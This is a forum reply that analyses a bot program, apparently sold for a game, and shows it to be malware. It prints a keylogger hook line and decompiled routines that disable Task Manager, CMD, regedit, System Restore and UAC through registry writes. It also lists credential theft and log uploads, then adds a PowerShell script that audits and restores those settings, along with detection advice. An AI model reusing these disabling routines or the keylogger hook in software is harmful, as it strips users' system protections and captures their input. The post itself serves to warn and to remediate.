Originally Posted by username1001011
Did you even read the article? What do packed system files have to do with this?
When I say it's a keylogger etc., I'm not making an assumption based on the VT output. I looked at the code and saw it.
Here is a very inconclusive list of nasty stuff this program does:
- Keylogger using a keyboard hook, in PoEEX Bot::KeyHook::Hook(): KeyHook.KHK = KeyHook.SetWindowsHookEx(WH_KEYBOARD_LL, KeyHook.KHD, (int)value, 0);
- Uploads logs to hxxp://www.limitlessproducts.org/Limitless/Login/submit_log.php as user=wedge92 in PoEXX Bot::mainFunctions::dispatchConfirmation()
- Takes screenshots of your computer and E-Mails them, PoEXX Bot::mainFunctions::Email()
- Forces you to log in to your Steam account
- Forces you to log in to Skype, sends Skype messages
- Visits websites
- Downloads and executes further stuff, possibly on command, didn't check
- Gets your Firefox, Chrome, Filezilla, Spotify, MSN, Pidgin, SmartFTP, DynDNS, CoreFTP, ... passwords if they are saved on your computer (recovery settings etc)
- Spreads itself over Skype
- Uses the ClassLibrary1 module (the embedded DLL) to do a lot more nasty stuff like disabling your TaskMgr, CMD, etc:
Code:
// ClassLibrary1.Functions.Other.Disables
// Hides the Control Panel via the NoControlPanel Explorer policy (runs reg.exe in a hidden window).
public static void ControlPanel()
{
    try
    {
        Interaction.Shell("REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f", AppWinStyle.Hide, false, -1);
    }
    catch (Exception arg_12_0)
    {
        // Decompiled VB.NET error handling: the exception is swallowed silently.
        ProjectData.SetProjectError(arg_12_0);
        ProjectData.ClearProjectError();
    }
}

// ClassLibrary1.Functions.Other.Disables
// Removes the Folder Options dialog via the NoFolderOptions Explorer policy.
public static void FolderOptions()
{
    try
    {
        Interaction.Shell("REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f", AppWinStyle.Hide, false, -1);
    }
    catch (Exception arg_12_0)
    {
        ProjectData.SetProjectError(arg_12_0);
        ProjectData.ClearProjectError();
    }
}

// ClassLibrary1.Functions.Other.Disables
// Blocks regedit for the current user (DisableRegistryTools policy).
public static void Registry()
{
    try
    {
        MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableRegistryTools", "1", RegistryValueKind.DWord);
    }
    catch (Exception arg_24_0)
    {
        ProjectData.SetProjectError(arg_24_0);
        ProjectData.ClearProjectError();
    }
}

// ClassLibrary1.Functions.Other.Disables
// Turns off System Restore machine-wide (DisableSR under HKLM, so this needs elevation to succeed).
public static void SystemRestore()
{
    try
    {
        MyProject.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore", "DisableSR", "1", RegistryValueKind.DWord);
    }
    catch (Exception arg_24_0)
    {
        ProjectData.SetProjectError(arg_24_0);
        ProjectData.ClearProjectError();
    }
}

// ClassLibrary1.Functions.Other.Disables
// Blocks Task Manager for the current user (DisableTaskMgr policy).
public static void TaskManager()
{
    try
    {
        MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableTaskMgr", "1", RegistryValueKind.DWord);
    }
    catch (Exception arg_24_0)
    {
        ProjectData.SetProjectError(arg_24_0);
        ProjectData.ClearProjectError();
    }
}

// ClassLibrary1.Functions.Other.Disables
// Disables UAC by setting EnableLUA to 0 under HKLM (needs elevation; takes effect after a reboot).
public static void Uac()
{
    try
    {
        Interaction.Shell("C:\\Windows\\System32\\cmd.exe /k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", AppWinStyle.Hide, false, -1);
    }
    catch (Exception arg_12_0)
    {
        ProjectData.SetProjectError(arg_12_0);
        ProjectData.ClearProjectError();
    }
}

// ClassLibrary1.Functions.Other.Disables
// Blocks the command prompt for the current user (DisableCMD policy).
public static void Cmd()
{
    try
    {
        MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "DisableCMD", "1", RegistryValueKind.DWord);
    }
    catch (Exception arg_24_0)
    {
        ProjectData.SetProjectError(arg_24_0);
        ProjectData.ClearProjectError();
    }
}
I find it great that people don't blindly believe stuff, but really? It's not that hard to look at it yourself, and linking articles that you either didn't read or didn't understand does not help anyone.
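The decompiled Disables methods quoted in the post each write one registry policy value, which makes the resulting state easy to audit. The following PowerShell script is an added example, not code from the post or from the sample: it checks every value the ClassLibrary1 methods set (the paths and value names are taken from the decompiled code above), reports which ones are in the tampered state, and with -Remediate restores the defaults. The default restored for the policy values is "value absent", and for EnableLUA it is 1; those defaults are my assumption of a clean baseline, so compare against your own GPO settings before remediating.

```powershell
# Added example (not from the original post): audit and optionally undo the
# registry policy changes made by ClassLibrary1.Functions.Other.Disables.
[CmdletBinding()]
param(
    # Restore defaults for any value found in the tampered state.
    [switch]$Remediate
)

# One entry per value the sample writes. Path and Name come from the decompiled
# code; Tampered is the value the sample sets; Restore is the assumed clean
# default ($null means "delete the value", which is how these policies are
# normally unset).
$checks = @(
    @{ Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'; Name = 'NoControlPanel';       Tampered = 1; Restore = $null }
    @{ Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'; Name = 'NoFolderOptions';      Tampered = 1; Restore = $null }
    @{ Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\System';   Name = 'DisableRegistryTools'; Tampered = 1; Restore = $null }
    @{ Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\System';   Name = 'DisableTaskMgr';       Tampered = 1; Restore = $null }
    @{ Path = 'HKCU:\Software\Policies\Microsoft\Windows\System';                  Name = 'DisableCMD';           Tampered = 1; Restore = $null }
    @{ Path = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore';  Name = 'DisableSR';            Tampered = 1; Restore = $null }
    @{ Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System';   Name = 'EnableLUA';            Tampered = 0; Restore = 1     }
)

$findings = foreach ($c in $checks) {
    $current = $null
    if (Test-Path -Path $c.Path) {
        # -Name on a missing value raises an error; treat that as "absent".
        $current = (Get-ItemProperty -Path $c.Path -Name $c.Name -ErrorAction SilentlyContinue).($c.Name)
    }
    $isTampered = ($null -ne $current) -and ([int]$current -eq $c.Tampered)

    [pscustomobject]@{
        Path     = $c.Path
        Name     = $c.Name
        Current  = if ($null -eq $current) { '<absent>' } else { $current }
        Tampered = $isTampered
    }

    if ($isTampered -and $Remediate) {
        if ($null -eq $c.Restore) {
            Remove-ItemProperty -Path $c.Path -Name $c.Name -ErrorAction Stop
        } else {
            Set-ItemProperty -Path $c.Path -Name $c.Name -Value $c.Restore -Type DWord -ErrorAction Stop
        }
        Write-Host "Restored $($c.Path)\$($c.Name)"
    }
}

$findings | Format-Table -AutoSize

if ($findings.Tampered -contains $true) {
    Write-Warning 'One or more policy values match the state set by the sample.'
    if ($Remediate) {
        Write-Warning 'EnableLUA changes take effect after a reboot; Explorer policies after logoff/logon.'
    }
    exit 1
}
```

Run it from an elevated PowerShell prompt, since DisableSR and EnableLUA live under HKLM and cannot be read reliably or written from a standard user session. For ongoing detection rather than a one-off audit, the same seven path/value pairs are good candidates for a Sysmon "Registry value set" (Event ID 13) rule, since a legitimate process rarely writes DisableTaskMgr, DisableRegistryTools or EnableLUA=0 outside of Group Policy processing.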